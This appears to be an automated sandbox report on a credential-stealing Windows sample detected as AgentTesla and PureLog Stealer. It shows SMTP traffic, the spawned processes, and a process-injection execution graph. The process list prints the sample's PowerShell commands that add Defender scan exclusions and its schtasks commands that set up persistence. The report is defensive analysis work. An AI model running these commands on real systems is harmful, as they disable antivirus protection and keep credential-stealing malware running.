                                                                                                              Jan 11, 2025 09:27:29.310444117 CET5875003977.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:35.033241987 CET5875004077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1736584054-YRknO3BOjGk0
                                                                                                              Jan 11, 2025 09:27:35.033478975 CET50040587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:35.242974997 CET5875004177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net Ok 1736584055-ZRkio47OriE0
                                                                                                              Jan 11, 2025 09:27:35.243159056 CET50041587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:35.259954929 CET5875004077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:35.260090113 CET50040587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:35.461033106 CET5875004177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:35.461252928 CET50041587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:35.486675978 CET5875004077.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:35.679372072 CET5875004177.88.21.158192.168.2.4220 Go ahead

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:03:23:22
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\kAsh3nmsgs.exe"
                                                                                                              Imagebase:0xa60000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                                                                                                              Imagebase:0x450000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                                                                                                              Imagebase:0x450000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:03:23:25
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\kAsh3nmsgs.exe"
                                                                                                              Imagebase:0x860000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:03:23:25
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              Imagebase:0xca0000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1769194056.0000000003039000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 79%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:03:23:27
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                              File size:496'640 bytes
                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:11
                                                                                                              Start time:03:23:29
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:03:23:29
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:03:23:29
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                                                                                                              Imagebase:0xbe0000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0.8%
                                                                                                                Total number of Nodes:237
                                                                                                                Total number of Limit Nodes:12
                                                                                                                execution_graph 33040 f180f38 33041 f1810c3 33040->33041 33042 f180f5e 33040->33042 33042->33041 33045 f1811b8 PostMessageW 33042->33045 33047 f1811b0 33042->33047 33046 f181224 33045->33046 33046->33042 33048 f1811b3 PostMessageW 33047->33048 33050 f181224 33048->33050 33050->33042 32866 9d55e80 32870 9d55e90 32866->32870 32881 9d55ea0 32866->32881 32867 9d55e8b 32872 9d55eb5 32870->32872 32871 9d55f3b 32879 9d55e90 GetCurrentThreadId 32871->32879 32880 9d55ea0 GetCurrentThreadId 32871->32880 32872->32871 32874 9d55f70 32872->32874 32873 9d55f45 32873->32867 32878 9d56074 32874->32878 32892 9d55014 32874->32892 32877 9d55014 GetCurrentThreadId 32877->32878 32878->32867 32879->32873 32880->32873 32883 9d55eb5 32881->32883 32882 9d55f3b 32890 9d55e90 GetCurrentThreadId 32882->32890 32891 9d55ea0 GetCurrentThreadId 32882->32891 32883->32882 32885 9d55f70 32883->32885 32884 9d55f45 32884->32867 32886 9d55014 GetCurrentThreadId 32885->32886 32889 9d56074 32885->32889 32887 9d56098 32886->32887 32888 9d55014 GetCurrentThreadId 32887->32888 32888->32889 32889->32867 32890->32884 32891->32884 32893 9d5501f 32892->32893 32894 9d563bf GetCurrentThreadId 32893->32894 32895 9d56098 32893->32895 32894->32895 32895->32877 33051 9d56e30 33055 9d56e58 33051->33055 33059 9d56e68 33051->33059 33052 9d56e4f 33056 9d56e71 33055->33056 33063 9d56eae 33056->33063 33057 9d56e96 33057->33052 33060 9d56e71 33059->33060 33062 9d56eae DrawTextExW 33060->33062 33061 9d56e96 33061->33052 33062->33061 33064 9d56eeb 33063->33064 33065 9d56eda 33063->33065 33066 9d56f79 33064->33066 33069 9d575d0 33064->33069 33074 9d575e0 33064->33074 33065->33057 33066->33057 33070 9d57608 33069->33070 33071 9d5770e 33070->33071 33079 9d57cf8 33070->33079 33084 9d57ce8 33070->33084 33071->33065 33075 9d57608 33074->33075 33076 9d5770e 33075->33076 33077 9d57cf8 DrawTextExW 33075->33077 33078 9d57ce8 DrawTextExW 33075->33078 33076->33065 33077->33076 33078->33076 33080 9d57d0e 33079->33080 33089 9d58109 33080->33089 33094 9d58118 33080->33094 33081 9d57d84 33081->33071 33085 9d57cec 33084->33085 33087 9d58109 DrawTextExW 33085->33087 33088 9d58118 DrawTextExW 33085->33088 33086 9d57d84 33086->33071 33087->33086 33088->33086 33090 9d58114 33089->33090 33099 9d58149 33090->33099 33104 9d58158 33090->33104 33091 9d58136 33091->33081 33095 9d5811b 33094->33095 33097 9d58149 DrawTextExW 33095->33097 33098 9d58158 DrawTextExW 33095->33098 33096 9d58136 33096->33081 33097->33096 33098->33096 33100 9d5814c 33099->33100 33101 9d581b6 33100->33101 33109 9d581c9 33100->33109 33114 9d581d8 33100->33114 33101->33091 33105 9d5815b 33104->33105 33106 9d581b6 33105->33106 33107 9d581c9 DrawTextExW 33105->33107 33108 9d581d8 DrawTextExW 33105->33108 33106->33091 33107->33106 33108->33106 33111 9d581cc 33109->33111 33110 9d5820e 33110->33101 33111->33110 33119 9d5745c 33111->33119 33113 9d58279 33116 9d581db 33114->33116 33115 9d5820e 33115->33101 33116->33115 33117 9d5745c DrawTextExW 33116->33117 33118 9d58279 33117->33118 33121 9d57467 33119->33121 33120 9d5a241 33120->33113 33121->33120 33125 9d5adc0 33121->33125 33129 9d5adaf 33121->33129 33122 9d5a354 33122->33113 33126 9d5adc3 33125->33126 33133 9d59f84 33126->33133 33130 9d5adbc 33129->33130 33131 9d59f84 DrawTextExW 33130->33131 33132 9d5addd 33131->33132 33132->33122 33134 9d5adf8 DrawTextExW 33133->33134 33136 9d5addd 33134->33136 33136->33122 32862 148e700 32863 148e748 GetModuleHandleW 32862->32863 32864 148e742 32862->32864 32865 148e775 32863->32865 32864->32863 33137 1487a20 33138 1487a2b 33137->33138 33140 1487b60 33137->33140 33141 1487b85 33140->33141 33145 1488068 33141->33145 33149 1488078 33141->33149 33147 148809f 33145->33147 33146 148817c 33146->33146 33147->33146 33153 1487cc4 33147->33153 33151 148809f 33149->33151 33150 148817c 33150->33150 33151->33150 33152 1487cc4 CreateActCtxA 33151->33152 33152->33150 33154 1489108 CreateActCtxA 33153->33154 33156 14891cb 33154->33156 33157 9d552b8 33158 9d552ee 33157->33158 33159 9d553ae 33158->33159 33162 9d5ea50 33158->33162 33166 9d5ea60 33158->33166 33163 9d5ea54 33162->33163 33164 9d5eac1 MonitorFromPoint 33163->33164 33165 9d5eaf2 33163->33165 33164->33165 33165->33159 33167 9d5eaa3 33166->33167 33168 9d5eac1 MonitorFromPoint 33167->33168 33169 9d5eaf2 33167->33169 33168->33169 33169->33159 32896 a04cf1a 32901 a04f5fe 32896->32901 32915 a04f598 32896->32915 32928 a04f588 32896->32928 32897 a04cf29 32902 a04f58c 32901->32902 32904 a04f601 32901->32904 32903 a04f5ba 32902->32903 32941 f180123 32902->32941 32945 f180222 32902->32945 32950 f180672 32902->32950 32955 f1801d0 32902->32955 32960 f1803ff 32902->32960 32965 f1802cf 32902->32965 32970 f18022e 32902->32970 32978 f1802bb 32902->32978 32983 f180286 32902->32983 32988 f180506 32902->32988 32903->32897 32904->32897 32916 a04f5b2 32915->32916 32917 f1802bb 2 API calls 32916->32917 32918 f18022e 4 API calls 32916->32918 32919 f1802cf 2 API calls 32916->32919 32920 f1803ff 2 API calls 32916->32920 32921 f1801d0 2 API calls 32916->32921 32922 f180672 2 API calls 32916->32922 32923 f180222 2 API calls 32916->32923 32924 f180123 2 API calls 32916->32924 32925 a04f5ba 32916->32925 32926 f180506 2 API calls 32916->32926 32927 f180286 2 API calls 32916->32927 32917->32925 32918->32925 32919->32925 32920->32925 32921->32925 32922->32925 32923->32925 32924->32925 32925->32897 32926->32925 32927->32925 32929 a04f58b 32928->32929 32930 a04f5ba 32929->32930 32931 f1802bb 2 API calls 32929->32931 32932 f18022e 4 API calls 32929->32932 32933 f1802cf 2 API calls 32929->32933 32934 f1803ff 2 API calls 32929->32934 32935 f1801d0 2 API calls 32929->32935 32936 f180672 2 API calls 32929->32936 32937 f180222 2 API calls 32929->32937 32938 f180123 2 API calls 32929->32938 32939 f180506 2 API calls 32929->32939 32940 f180286 2 API calls 32929->32940 32930->32897 32931->32930 32932->32930 32933->32930 32934->32930 32935->32930 32936->32930 32937->32930 32938->32930 32939->32930 32940->32930 32992 a04ca70 32941->32992 32996 a04ca65 32941->32996 32942 f180160 32946 f1801d7 32945->32946 33000 a04c5a0 32946->33000 33004 a04c599 32946->33004 32947 f180203 32947->32903 32951 f180b15 32950->32951 33008 a04c650 32951->33008 33012 a04c648 32951->33012 32952 f180b30 32956 f1801d6 32955->32956 32958 a04c5a0 ResumeThread 32956->32958 32959 a04c599 ResumeThread 32956->32959 32957 f180203 32957->32903 32958->32957 32959->32957 32961 f18041a 32960->32961 33016 a04c7e1 32961->33016 33020 a04c7e8 32961->33020 32962 f1807c1 32966 f180474 32965->32966 33024 a04c8d0 32966->33024 33028 a04c8d8 32966->33028 32967 f1801b2 32967->32903 33032 a04c720 32970->33032 33036 a04c728 32970->33036 32971 f18024c 32972 f18098e 32971->32972 32976 a04c7e1 WriteProcessMemory 32971->32976 32977 a04c7e8 WriteProcessMemory 32971->32977 32972->32903 32973 f180a50 32976->32973 32977->32973 32979 f18068a 32978->32979 32981 a04c7e1 WriteProcessMemory 32979->32981 32982 a04c7e8 WriteProcessMemory 32979->32982 32980 f180899 32981->32980 32982->32980 32984 f180a2f 32983->32984 32986 a04c7e1 WriteProcessMemory 32984->32986 32987 a04c7e8 WriteProcessMemory 32984->32987 32985 f180a50 32986->32985 32987->32985 32990 a04c650 Wow64SetThreadContext 32988->32990 32991 a04c648 Wow64SetThreadContext 32988->32991 32989 f18052a 32990->32989 32991->32989 32993 a04caf9 CreateProcessA 32992->32993 32995 a04ccbb 32993->32995 32997 a04caf9 CreateProcessA 32996->32997 32999 a04ccbb 32997->32999 33001 a04c5e0 ResumeThread 33000->33001 33003 a04c611 33001->33003 33003->32947 33005 a04c5e0 ResumeThread 33004->33005 33007 a04c611 33005->33007 33007->32947 33009 a04c695 Wow64SetThreadContext 33008->33009 33011 a04c6dd 33009->33011 33011->32952 33013 a04c695 Wow64SetThreadContext 33012->33013 33015 a04c6dd 33013->33015 33015->32952 33017 a04c830 WriteProcessMemory 33016->33017 33019 a04c887 33017->33019 33019->32962 33021 a04c830 WriteProcessMemory 33020->33021 33023 a04c887 33021->33023 33023->32962 33025 a04c8d8 ReadProcessMemory 33024->33025 33027 a04c967 33025->33027 33027->32967 33029 a04c923 ReadProcessMemory 33028->33029 33031 a04c967 33029->33031 33031->32967 33033 a04c728 VirtualAllocEx 33032->33033 33035 a04c7a5 33033->33035 33035->32971 33037 a04c768 VirtualAllocEx 33036->33037 33039 a04c7a5 33037->33039 33039->32971

                                                                                                                Executed Functions

                                                                                                                Function 09D50040 Relevance: 7.7, Strings: 4, Instructions: 2699COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                • API String ID: 0-183542557
                                                                                                                • Opcode ID: 70f53d6db2a7dd3b8f0516f3adf4a792f0921777ac73260f41c3b48689c35d90
                                                                                                                • Instruction ID: c959a4ea79d90abd421de3abab96fee37ee81a589930549b99e88aac8ea97dbd
                                                                                                                • Opcode Fuzzy Hash: 70f53d6db2a7dd3b8f0516f3adf4a792f0921777ac73260f41c3b48689c35d90
                                                                                                                • Instruction Fuzzy Hash: 41530774A41219CFCF24DF68C888A9DB7B2BF49310F158599E95AAB760CB30ED85CF50
                                                                                                                Function 09D52DD8 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1367 9d52dd8-9d52de1 1368 9d52de3-9d52ded 1367->1368 1369 9d52def-9d52e0b 1367->1369 1368->1369 1372 9d52e28-9d52e3c 1368->1372 1375 9d52e23-9d52e25 1369->1375 1376 9d52e0d-9d52e21 1369->1376 1379 9d52e43-9d52e79 1372->1379 1376->1375 1376->1379 1384 9d52e7f-9d52e91 1379->1384 1385 9d52f4e-9d52f51 1379->1385 1387 9d52ea6-9d52ea9 1384->1387 1388 9d52e93-9d52e96 1384->1388 1391 9d52eb9-9d52ebf 1387->1391 1392 9d52eab-9d52eae 1387->1392 1389 9d52e9c-9d52e9f 1388->1389 1390 9d52f1b-9d52f21 1388->1390 1393 9d52ea1 1389->1393 1394 9d52eea-9d52ef0 1389->1394 1397 9d52f27-9d52f33 1390->1397 1398 9d52f23-9d52f25 1390->1398 1399 9d52ec5-9d52ed1 1391->1399 1400 9d52ec1-9d52ec3 1391->1400 1395 9d52eb4 1392->1395 1396 9d52f4a-9d52f4c 1392->1396 1393->1396 1401 9d52ef6-9d52f02 1394->1401 1402 9d52ef2-9d52ef4 1394->1402 1395->1396 1396->1385 1403 9d52f52-9d52fd4 1396->1403 1404 9d52f35-9d52f48 1397->1404 1398->1404 1405 9d52ed3-9d52ee8 1399->1405 1400->1405 1406 9d52f04-9d52f19 1401->1406 1402->1406 1421 9d52fd6-9d52fdc 1403->1421 1422 9d52fec-9d52ff4 1403->1422 1404->1396 1405->1396 1406->1396 1423 9d52fe0-9d52fea 1421->1423 1424 9d52fde 1421->1424 1425 9d531a0-9d531a2 1422->1425 1426 9d52ffa-9d52ffc 1422->1426 1423->1422 1424->1422 1428 9d531a4-9d531a9 1425->1428 1429 9d531ac-9d531b3 1425->1429 1426->1425 1427 9d53002-9d53006 1426->1427 1431 9d530f0-9d530f8 1427->1431 1432 9d5300c-9d53014 1427->1432 1428->1429 1431->1425 1433 9d530fe-9d53102 1431->1433 1432->1425 1434 9d5301a-9d5301e 1432->1434 1435 9d53104-9d53113 1433->1435 1436 9d5313c-9d5314b 1433->1436 1437 9d53020-9d5302f 1434->1437 1438 9d5305b-9d5306e 1434->1438 1435->1425 1445 9d53119-9d5311c 1435->1445 1436->1425 1443 9d5314d-9d53150 1436->1443 1437->1425 1446 9d53035-9d53038 1437->1446 1438->1425 1444 9d53074 1438->1444 1448 9d53153-9d5315c 1443->1448 1449 9d53077-9d5307d 1444->1449 1450 9d5311f-9d53122 1445->1450 1447 9d5303b-9d5303e 1446->1447 1451 9d53044-9d5304c 1447->1451 1452 9d531bb-9d531ed 1447->1452 1448->1452 1453 9d5315e-9d53163 1448->1453 1449->1452 1454 9d53083-9d53089 1449->1454 1450->1452 1455 9d53128-9d53130 1450->1455 1456 9d531b6 1451->1456 1457 9d53052-9d53054 1451->1457 1458 9d53165-9d5316b 1453->1458 1459 9d53197-9d5319a 1453->1459 1460 9d530dd-9d530e0 1454->1460 1461 9d5308b-9d5309b 1454->1461 1455->1456 1462 9d53136-9d53138 1455->1462 1456->1452 1457->1447 1463 9d53056 1457->1463 1458->1452 1466 9d5316d-9d53175 1458->1466 1459->1456 1467 9d5319c-9d5319e 1459->1467 1460->1456 1464 9d530e6-9d530e9 1460->1464 1461->1460 1474 9d5309d-9d530a9 1461->1474 1462->1450 1468 9d5313a 1462->1468 1463->1425 1464->1449 1469 9d530eb 1464->1469 1466->1452 1470 9d53177-9d5317d 1466->1470 1467->1425 1467->1448 1468->1425 1469->1425 1470->1459 1473 9d5317f-9d5318a 1470->1473 1473->1452 1475 9d5318c-9d53190 1473->1475 1474->1452 1476 9d530af-9d530b7 1474->1476 1475->1459 1476->1452 1477 9d530bd-9d530cc 1476->1477 1477->1452 1478 9d530d2-9d530d6 1477->1478 1478->1460
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4|cq$4|cq
                                                                                                                • API String ID: 0-1798997883
                                                                                                                • Opcode ID: 960094d3629bc0673188ec6df88818364e1ef54bab3bcc96c9a2c4a78f8eab8b
                                                                                                                • Instruction ID: 7d319c2bbf00a8cc1e58b17d4122762e34eb9a2fe3cee1f3576d85d256bffe43
                                                                                                                • Opcode Fuzzy Hash: 960094d3629bc0673188ec6df88818364e1ef54bab3bcc96c9a2c4a78f8eab8b
                                                                                                                • Instruction Fuzzy Hash: 87C1D235740211CFCF19CF39C494A6ABBB2AF85340B2584A9E856DBB65CB31EC85C7A1
                                                                                                                Function 0F1822A8 Relevance: .4, Instructions: 395COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b2b35b9865fc0957e46aed7975bfeca44a1c24afb8b21049653a48dc64a41252
                                                                                                                • Instruction ID: 6f84379e8f701f6895e7d0538ce037f48d23b5f50bbd980419cd62ed478062a4
                                                                                                                • Opcode Fuzzy Hash: b2b35b9865fc0957e46aed7975bfeca44a1c24afb8b21049653a48dc64a41252
                                                                                                                • Instruction Fuzzy Hash: 29E1DE31B017449FDB2AFB76C650BAEB7F6AF99300F24446ED0459B2A1CB35E902CB51
